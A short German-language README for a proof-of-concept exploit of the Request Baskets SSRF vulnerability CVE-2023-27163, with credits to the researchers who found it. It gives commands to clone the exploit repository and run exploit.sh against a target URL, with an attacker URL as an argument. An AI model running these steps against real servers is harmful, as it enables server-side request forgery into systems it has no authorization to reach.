
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Request Baskets Versionen <1.2.1 sind anfällig für Server-Side-Request-Forgery-Angriffe (SSRF) über die Komponente /api/baskets/{name}.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
Dank an @beet1e von der Shanghai Jiao Tong University und @chenlibo147, @houqinsheng, [email protected] von der Shandong University. Artikel : https://notes.sjtu.edu.cn/s/MUUhEymt7#